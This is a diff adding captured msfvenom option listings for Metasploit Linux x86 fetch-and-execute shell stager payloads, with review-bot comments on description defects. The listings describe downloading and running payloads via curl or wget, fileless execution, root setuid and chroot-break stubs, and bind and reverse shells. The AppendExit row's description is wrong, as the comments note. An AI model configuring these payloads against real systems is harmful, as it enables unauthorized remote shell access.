setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..b60a6ed --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp.txt 
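Review bot: in the cmd-linux-http-x86-read_file.txt hunk above, AppendExit is described as "Prepend a stub that will break out of a chroot (includes setreuid to root)", which is PrependChrootBreak's description repeated verbatim and cannot be what an option named AppendExit does. The text is captured from msfvenom, so the fix belongs upstream, but a short note in the README (or a reported issue linked from it) would stop readers taking the captured description as the option's behaviour; the same line appears in every file in this patch.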
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fdqkxAHaFzWZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..9e7c3db --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt 
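Review bot: the second option table in the cmd-linux-http-x86-shell-bind_ipv6_tcp.txt hunk above (AppendExit through WORKSPACE) has no heading, while the first table is labelled "Basic options:"; the capture appears to have dropped msfvenom's "Advanced options" heading. Keep that label in the generated file so a reader can tell which settings are surfaced by default and which are advanced, otherwise the two tables read as one list with duplicate column headers.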
@@ -0,0 +1,95 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wMOWTCaGA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). 
+ + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_nonx_tcp.txt new file mode 100644 index 0000000..e077d3c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_nonx_tcp.txt 
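Review bot: the FETCH_FILELESS description in the cmd-linux-http-x86-shell-bind_ipv6_tcp_uuid.txt hunk above has unbalanced parentheses ("requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)"), and the same string appears in every file in this patch. Since it is upstream text captured verbatim, report it against metasploit-framework rather than hand-editing it here; a local fix would be overwritten on the next regeneration.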
@@ -0,0 +1,92 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/http/x86/shell/bind_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vTUEvLaWEShh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..a24123b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp.txt 
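Review bot: the PingbackRetries description in the cmd-linux-http-x86-shell-bind_nonx_tcp.txt hunk above ("How many additional successful pingbacks") is a sentence fragment that does not say what the count controls, and it is repeated in the other staged shell files of this patch. Upstream text again, so leave the captured line as is, but it is worth flagging in the same upstream report as the other description defects so the regenerated files eventually carry a complete sentence.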
@@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dTytfMAWFU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..ac75929 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-bind_tcp_uuid.txt 
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/shell/bind_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YbgKKdLnKV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-find_tag.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-find_tag.txt new file mode 100644 index 0000000..fd57d79 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-find_tag.txt 
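Review bot: the FETCH_FILENAME default `YbgKKdLnKV` in this hunk is a per-run random value, so every regeneration of cmd-linux-http-x86-shell-bind_tcp_uuid.txt will produce a spurious diff in that row; consider post-processing the dump to replace randomized defaults with a fixed placeholder, or record the exact generation command in the repository so reviewers can reproduce the file byte for byte. Also worth flagging upstream rather than patching here: the AppendExit row carries the PrependChrootBreak description ("Prepend a stub that will break out of a chroot (includes setreuid to root)"), which does not match the option name.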
@@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Tag Stager + Module: payload/cmd/linux/http/x86/shell/find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QzZYNZBjs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG g3Ix yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..c57ddd5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_ipv6_tcp.txt 
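Review bot: the AppendExit row in this hunk repeats the PrependChrootBreak description word for word ("Prepend a stub that will break out of a chroot (includes setreuid to root)"), so the captured text describes the wrong option; if the dump is verbatim Metasploit output this is an upstream metadata bug worth reporting, and a short note in the commit message would stop readers treating the row as authoritative. The TAG default `g3Ix` in the same hunk is a random four-byte value that will change on every regeneration, so it has the same churn problem as FETCH_FILENAME.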
@@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AyqIvKLrYhI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). 
